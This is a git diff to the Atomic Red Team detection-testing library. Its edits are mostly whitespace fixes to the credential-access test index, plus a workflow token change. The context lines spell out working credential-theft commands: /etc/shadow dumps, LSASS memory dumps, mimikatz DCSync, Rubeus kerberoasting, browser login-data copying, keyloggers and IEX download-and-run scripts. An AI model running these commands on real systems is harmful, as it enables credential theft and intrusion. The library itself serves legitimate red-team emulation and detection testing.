diff --git a/.github/workflows/generate-docs.yml b/.github/workflows/generate-docs.yml
index 66bc2998..64798f65 100644
--- a/.github/workflows/generate-docs.yml
+++ b/.github/workflows/generate-docs.yml
@@ -9,6 +9,9 @@ jobs:
steps:
- name: checkout repo
uses: actions/checkout@v2
+ with:
+ token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
+ ref: 'master'
- name: setup ruby
uses: ruby/setup-ruby@v1
diff --git a/README.md b/README.md
index ef8c005a..c6043789 100644
--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
# Atomic Red Team
-[](https://circleci.com/gh/redcanaryco/atomic-red-team)
+
Atomic Red Team™ is library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index a29bf92f..e6cba7ed 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -61,7 +61,7 @@ credential-access:
cat #{output_file}
cleanup_command: 'rm -f #{output_file}
-'
+ '
name: bash
elevation_required: true
- name: Access /etc/passwd (Local)
@@ -80,13 +80,13 @@ credential-access:
cat #{output_file}
cleanup_command: 'rm -f #{output_file}
-'
+ '
name: sh
- name: Access /etc/{shadow,passwd} with a standard bin that's not cat
auto_generated_guid: df1a55ae-019d-4120-bc35-94f4bc5c4b0a
description: 'Dump /etc/passwd and /etc/shadow using ed
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -97,17 +97,17 @@ credential-access:
executor:
command: 'echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}
-'
+ '
cleanup_command: 'rm -f #{output_file}
-'
+ '
name: bash
elevation_required: true
- name: Access /etc/{shadow,passwd} with shell builtins
auto_generated_guid: f5aa6543-6cb2-4fae-b9c2-b96e14721713
description: 'Dump /etc/passwd and /etc/shadow using bash builtins
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -122,7 +122,7 @@ credential-access:
testcat /etc/shadow > #{output_file}
cleanup_command: 'rm -f #{output_file}
-'
+ '
name: bash
elevation_required: true
T1557.002:
@@ -314,32 +314,32 @@ credential-access:
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
- description: 'Rubeus must exist
-'
+ '
prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
-'
+ '
executor:
command: 'cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}"
-'
+ '
cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: false
- name: Get-DomainUser with PowerView
@@ -348,7 +348,7 @@ credential-access:
Upon execution, progress and info about users within the domain being scanned
will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -457,7 +457,7 @@ credential-access:
description: 'Search through bash history for specifice commands we want to
capture
-'
+ '
supported_platforms:
- linux
- macos
@@ -479,7 +479,7 @@ credential-access:
command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} >
#{output_file}
-'
+ '
name: sh
T1110:
technique:
@@ -608,7 +608,7 @@ credential-access:
elevation_required: false
command: 'cmdkey /list
-'
+ '
T1552.005:
technique:
object_marking_refs:
@@ -729,7 +729,7 @@ credential-access:
pod service account, for example) can access sensitive information that might
include credentials to various services.
-'
+ '
supported_platforms:
- containers
input_arguments:
@@ -740,17 +740,17 @@ credential-access:
dependencies:
- description: 'kubectl must be installed
-'
+ '
get_prereq_command: 'echo "kubectl must be installed manually"
-'
+ '
prereq_command: 'which kubectl
-'
+ '
executor:
command: 'kubectl get secrets -n #{namespace}
-'
+ '
name: bash
elevation_required: false
- name: Cat the contents of a Kubernetes service account token file
@@ -758,7 +758,7 @@ credential-access:
description: 'Access the Kubernetes service account access token stored within
a container in a cluster.
-'
+ '
supported_platforms:
- linux
dependency_executor_name: sh
@@ -766,24 +766,24 @@ credential-access:
- description: Verify docker is installed.
prereq_command: 'which docker
-'
+ '
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
echo "Docker installed"; fi
-'
+ '
- description: Verify docker service is running.
prereq_command: 'sudo systemctl status docker
-'
+ '
get_prereq_command: 'sudo systemctl start docker
-'
+ '
- description: Verify kind is in the path.
prereq_command: 'which kind
-'
+ '
get_prereq_command: |
curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64
chmod +x ./kind
@@ -791,14 +791,14 @@ credential-access:
- description: Verify kind-atomic-cluster is created
prereq_command: 'sudo kind get clusters
-'
+ '
get_prereq_command: 'sudo kind create cluster --name atomic-cluster
-'
+ '
- description: Verify kubectl is in path
prereq_command: 'which kubectl
-'
+ '
get_prereq_command: |
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x ./kubectl
@@ -806,19 +806,19 @@ credential-access:
- description: Verify atomic-pod is running.
prereq_command: 'kubectl --context kind-atomic-cluster get pods |grep atomic-pod
-'
+ '
get_prereq_command: 'kubectl --context kind-atomic-cluster run atomic-pod
--image=alpine --command -- sleep infinity
-'
+ '
executor:
command: 'kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token
-'
+ '
name: sh
cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-pod
-'
+ '
T1056.004:
technique:
object_marking_refs:
@@ -920,7 +920,7 @@ credential-access:
auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33
description: 'Hooks functions in PowerShell to read TLS Communications
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -936,10 +936,10 @@ credential-access:
dependencies:
- description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name})
-'
+ '
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing
@@ -1025,7 +1025,7 @@ credential-access:
description: 'Using username,password combination from a password dump to login
over SSH.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -1037,16 +1037,16 @@ credential-access:
dependencies:
- description: 'Requires SSHPASS
-'
+ '
prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] ||
[ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo
apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
-'
+ '
executor:
name: bash
elevation_required: false
@@ -1058,7 +1058,7 @@ credential-access:
description: 'Using username,password combination from a password dump to login
over SSH.
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -1070,11 +1070,11 @@ credential-access:
dependencies:
- description: 'Requires SSHPASS
-'
+ '
prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: |
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)"
brew install hudochenkov/sshpass/sshpass
@@ -1170,14 +1170,14 @@ credential-access:
executor:
command: 'python2 laZagne.py all
-'
+ '
elevation_required: true
name: bash
- name: Extract passwords with grep
auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4
description: 'Extracting credentials from files
-'
+ '
supported_platforms:
- macos
- linux
@@ -1189,14 +1189,14 @@ credential-access:
executor:
command: 'grep -ri password #{file_path}
-'
+ '
name: sh
- name: Extracting passwords with findstr
auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513
description: 'Extracting Credentials from Files. Upon execution, the contents
of files that contain the word "password" will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -1222,7 +1222,7 @@ credential-access:
description: 'This test looks for .netrc files (which stores github credentials
in clear text )and dumps its contents if found.
-'
+ '
supported_platforms:
- macos
- linux
@@ -1286,7 +1286,7 @@ credential-access:
dependencies:
- description: 'Microsoft Word must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "word.Application" | Out-Null
@@ -1297,7 +1297,7 @@ credential-access:
get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -1306,7 +1306,7 @@ credential-access:
cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction
Ignore
-'
+ '
name: powershell
- name: Dump credentials from Windows Credential Manager With PowerShell [windows
Credentials]
@@ -1333,7 +1333,7 @@ credential-access:
command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1''
-UseBasicParsing); Get-CredManCreds -Force
-'
+ '
- name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe
[Windows Credentials]
auto_generated_guid: 36753ded-e5c4-4eb5-bc3c-e8fba236878d
@@ -1346,7 +1346,7 @@ credential-access:
elevation_required: false
command: 'vaultcmd /listcreds:"Windows Credentials" /all
-'
+ '
- name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe
[Web Credentials]
auto_generated_guid: bc071188-459f-44d5-901a-f8f2625b2d2e
@@ -1359,7 +1359,7 @@ credential-access:
elevation_required: false
command: 'vaultcmd /listcreds:"Web Credentials" /all
-'
+ '
T1555.003:
technique:
object_marking_refs:
@@ -1471,11 +1471,11 @@ credential-access:
dependencies:
- description: 'Modified Sysinternals must be located at #{file_path}
-'
+ '
prereq_command: 'if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip"
@@ -1488,7 +1488,7 @@ credential-access:
cleanup_command: 'Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction
Ignore
-'
+ '
name: powershell
- name: Search macOS Safari Cookies
auto_generated_guid: c1402f7b-67ca-43a8-b5f3-3143abedc01b
@@ -1525,10 +1525,10 @@ credential-access:
dependencies:
- description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path})
-'
+ '
prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}"
@@ -1546,7 +1546,7 @@ credential-access:
dependencies:
- description: 'Chrome must be installed
-'
+ '
prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe")
-Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"))
{exit 0} else {exit 1}
@@ -1574,7 +1574,7 @@ credential-access:
dependencies:
- description: 'Opera must be installed
-'
+ '
prereq_command: if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe")
-Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program
Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1}
@@ -1586,23 +1586,23 @@ credential-access:
Stop-Process -Name "opera"
- description: 'Opera login data file must exist
-'
+ '
prereq_command: if (Test-Path "$env:APPDATA\Opera Software\Opera Stable\Login
Data") {exit 0} else {exit 1}
get_prereq_command: 'New-Item -Path "$env:APPDATA\Opera Software\Opera Stable\Login
Data" -ItemType File
-'
+ '
executor:
name: powershell
command: 'Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data"
-Destination $env:temp
-'
+ '
cleanup_command: 'Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction
Ignore
-'
+ '
- name: Simulating access to Windows Firefox Login Data
auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c
description: |
@@ -1614,7 +1614,7 @@ credential-access:
dependencies:
- description: 'Firefox must be installed
-'
+ '
prereq_command: if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe")
-Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit
0} else {exit 1}
@@ -1625,7 +1625,7 @@ credential-access:
Start-Process $installer -ArgumentList '/S' -Wait
- description: 'Firefox login data file must exist
-'
+ '
prereq_command: if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit
0} else {exit 1}
get_prereq_command: |
@@ -1639,11 +1639,11 @@ credential-access:
command: 'Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination
$env:temp -Force -Recurse
-'
+ '
cleanup_command: 'Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction
Ignore -Recurse
-'
+ '
- name: Simulating access to Windows Edge Login Data
auto_generated_guid: a6a5ec26-a2d1-4109-9d35-58b867689329
description: |
@@ -1655,16 +1655,16 @@ credential-access:
dependencies:
- description: 'Edge must be installed
-'
+ '
prereq_command: if (Test-Path "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe")
{exit 0} else {exit 1}
get_prereq_command: '"Installation is not implemented as Edge is a part of
windows"
-'
+ '
- description: 'Edge login data file must exist
-'
+ '
prereq_command: if (Test-Path "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default")
{exit 0} else {exit 1}
get_prereq_command: "$edge=\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\"\nStart-Process
@@ -1674,11 +1674,11 @@ credential-access:
command: 'Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination
$env:temp\Edge -Force -Recurse
-'
+ '
cleanup_command: 'Remove-Item -Path "$env:temp\Edge" -Force -ErrorAction Ignore
-Recurse
-'
+ '
- name: Decrypt Mozilla Passwords with Firepwd.py
auto_generated_guid: dc9cd677-c70f-4df5-bd1c-f114af3c2381
description: "Firepwd.py is a script that can decrypt Mozilla (Thunderbird,
@@ -1703,15 +1703,15 @@ credential-access:
dependencies:
- description: 'Firepwd must exist at #{Firepwd_Path}
-'
+ '
prereq_command: if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py"
-outfile "#{Firepwd_Path}"
-'
+ '
- description: 'Firefox profile directory must be present
-'
+ '
prereq_command: if (get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
-erroraction silentlycontinue) {exit 0} else {exit 1}
get_prereq_command: |
@@ -1723,14 +1723,14 @@ credential-access:
stop-process -name "firefox"
- description: 'Visual Studio Build Tools command prompt must exist at #{VS_CMD_Path}
-'
+ '
prereq_command: if (Test-Path "#{VS_CMD_Path}") {exit 0} else {exit 1}
get_prereq_command: |
invoke-webrequest "https://aka.ms/vs/17/release/vs_BuildTools.exe" -outfile "$env:temp\VS_BuildTools.exe"
write-host "Visual Studio Build Tools (Desktop Development with C++) must be installed manually. Please run the installer from $env:temp\VS_BuildTools.exe."
- description: 'Pip must be installed.
-'
+ '
prereq_command: if (pip -v) {exit 0} else {exit 1}
get_prereq_command: "invoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-outfile \"$env:temp\\ez_setup.py\" \ninvoke-webrequest \"https://bootstrap.pypa.io/get-pip.py\"
@@ -1743,7 +1743,7 @@ credential-access:
"Visual Studio Build Tools (C++ Support) must be installed to continue gathering
this prereq"}
-'
+ '
- description: "Pyasn1 library must be installed \n"
prereq_command: if (pip show pyasn1) {exit 0} else {exit 1}
get_prereq_command: 'if (test-path "#{VS_CMD_Path}"){pip install pyasn1 |
@@ -1751,7 +1751,7 @@ credential-access:
"Visual Studio Build Tools (C++ Support) must be installed to continue gathering
this prereq."}
-'
+ '
executor:
name: powershell
command: |
@@ -1817,7 +1817,7 @@ credential-access:
description: 'Queries to enumerate for credentials in the Registry. Upon execution,
any registry key containing the word "password" will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -1835,7 +1835,7 @@ credential-access:
executor:
command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s
-'
+ '
name: command_prompt
T1003.006:
technique:
@@ -1952,7 +1952,7 @@ credential-access:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
-'
+ '
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -1969,7 +1969,7 @@ credential-access:
command: '#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}"
"exit"
-'
+ '
- name: Run DSInternals Get-ADReplAccount
auto_generated_guid: a0bced08-3fc5-4d8b-93b7-e8344739376e
description: "The following Atomic will run Get-ADReplAccount from DSInternals.\nUpon
@@ -1986,18 +1986,18 @@ credential-access:
dependencies:
- description: 'DSInternals must be installed
-'
+ '
prereq_command: |
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name DSInternals -Scope CurrentUser -Force
-'
+ '
executor:
command: 'Get-ADReplAccount -All -Server #{logonserver}
-'
+ '
name: powershell
elevation_required: false
T1556.001:
@@ -2206,7 +2206,7 @@ credential-access:
description: 'This module runs the Windows executable of PetitPotam in order
to coerce authentication for a remote system.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -2235,11 +2235,11 @@ credential-access:
prereq_command: 'if (Test-Path "#{petitpotam_path}") { exit 0 } else { exit
1 }
-'
+ '
get_prereq_command: 'Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd59c5afcaac67672b9ef2981/PetitPotam.exe?raw=true"
-OutFile "#{petitpotam_path}"
-'
+ '
executor:
name: powershell
elevation_required: false
@@ -2404,7 +2404,7 @@ credential-access:
to apply changes." & return & return default answer "" with icon 1 with
hidden answer with title "Software Update"''
-'
+ '
name: bash
- name: PowerShell - Prompt User for Password
auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
@@ -2535,7 +2535,7 @@ credential-access:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
-'
+ '
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -2613,25 +2613,25 @@ credential-access:
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
- description: 'Rubeus must exist
-'
+ '
prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
-'
+ '
executor:
name: powershell
elevation_required: false
@@ -2725,26 +2725,26 @@ credential-access:
files on the Domain Controller. This value can be decrypted with gpp-decrypt
on Kali Linux.
-'
+ '
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
executor:
command: 'findstr /S cpassword %logonserver%\sysvol\*.xml
-'
+ '
name: command_prompt
- name: GPP Passwords (Get-GPPPassword)
auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c
@@ -2769,25 +2769,25 @@ credential-access:
dependencies:
- description: 'Get-GPPPassword PowerShell Script must exist at #{gpp_script_path}
-'
+ '
prereq_command: 'if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1
}
-'
+ '
get_prereq_command: |
New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null
Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}"
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
executor:
command: |
. #{gpp_script_path}
@@ -2960,15 +2960,15 @@ credential-access:
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -3008,32 +3008,32 @@ credential-access:
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
- description: 'Rubeus must exist
-'
+ '
prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
-'
+ '
executor:
command: |
klist purge
cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"
cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: false
- name: Extract all accounts in use as SPN using setspn
@@ -3053,19 +3053,19 @@ credential-access:
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
executor:
command: 'setspn -T #{domain_name} -Q */*
-'
+ '
name: command_prompt
- name: Request A Single Ticket via PowerShell
auto_generated_guid: 988539bc-2ed7-4e62-aec6-7c5cf6680863
@@ -3079,15 +3079,15 @@ credential-access:
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
executor:
command: "Add-Type -AssemblyName System.IdentityModel\n$ComputerFQDN=$env:LogonServer.trimStart('\\')
+ \".\" + $env:UserDnsDomain\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken
@@ -3110,15 +3110,15 @@ credential-access:
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
executor:
command: "Add-Type -AssemblyName System.IdentityModel \nsetspn.exe -T #{domain_name}
-Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken
@@ -3287,7 +3287,7 @@ credential-access:
.\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Living off the land Terminal Input Capture on Linux with pam.d
@@ -3306,14 +3306,14 @@ credential-access:
dependencies:
- description: 'Checking if pam_tty_audit.so is installed
-'
+ '
prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so''
-'
+ '
get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so
and recompile, for this test to work"
-'
+ '
supported_platforms:
- linux
executor:
@@ -3344,14 +3344,14 @@ credential-access:
- description: 'This test requires to be run in a bash shell and that logger
and tee are installed.
-'
+ '
prereq_command: |
if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -3361,7 +3361,7 @@ credential-access:
tail /var/log/syslog
cleanup_command: 'unset PROMPT_COMMAND
-'
+ '
- name: Bash session based keylogger
auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
description: "When a command is executed in bash, the BASH_COMMAND variable
@@ -3378,14 +3378,14 @@ credential-access:
dependencies:
- description: 'This test requires to be run in a bash shell
-'
+ '
prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n*****
Bash not running! *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
input_arguments:
output_file:
name: output_file
@@ -3401,7 +3401,7 @@ credential-access:
cat #{output_file}
cleanup_command: 'rm #{output_file}
-'
+ '
- name: SSHD PAM keylogger
auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca
description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication.
@@ -3409,20 +3409,20 @@ credential-access:
of TTY input and capture all keystrokes in a ssh session and place them in
the /var/log/audit/audit.log file after the session closes.
-'
+ '
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'This test requires sshd and auditd
-'
+ '
prereq_command: |
if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
get_prereq_command: 'echo ""
-'
+ '
input_arguments:
user_account:
description: Basic ssh user account for testing.
@@ -3436,7 +3436,7 @@ credential-access:
restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n"
cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/
-'
+ '
- name: Auditd keylogger
auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af
description: "The linux audit tool auditd can be used to capture 32 and 64 bit
@@ -3448,14 +3448,14 @@ credential-access:
dependencies:
- description: 'This test requires sshd and auditd
-'
+ '
prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n*****
auditd NOT installed *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -3464,7 +3464,7 @@ credential-access:
$(date +\"%d/%m/%y %H:%M:%S\") \n"
cleanup_command: 'systemctl restart auditd
-'
+ '
T1557.001:
technique:
object_marking_refs:
@@ -3790,10 +3790,10 @@ credential-access:
- description: 'ProcDump tool from Sysinternals must exist on disk at specified
location (#{procdump_exe})
-'
+ '
prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
@@ -3804,7 +3804,7 @@ credential-access:
command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n"
cleanup_command: 'del "#{output_file}" >nul 2> nul
-'
+ '
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using comsvcs.dll
@@ -3819,10 +3819,10 @@ credential-access:
command: 'C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll,
MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
-'
+ '
cleanup_command: 'Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Dump LSASS.exe Memory using direct system calls and API unhooking
@@ -3845,10 +3845,10 @@ credential-access:
- description: 'Dumpert executable must exist on disk at specified location
(#{dumpert_exe})
-'
+ '
prereq_command: 'if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
@@ -3857,7 +3857,7 @@ credential-access:
command: "#{dumpert_exe}\n"
cleanup_command: 'del C:\windows\temp\dumpert.dmp >nul 2> nul
-'
+ '
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using NanoDump
@@ -3875,21 +3875,21 @@ credential-access:
- description: 'NanoDump executable must exist on disk at specified location
($env:TEMP\nanodump.x64.exe)
-'
+ '
prereq_command: 'if (Test-Path $env:TEMP\nanodump.x64.exe) {exit 0} else {exit
1}
-'
+ '
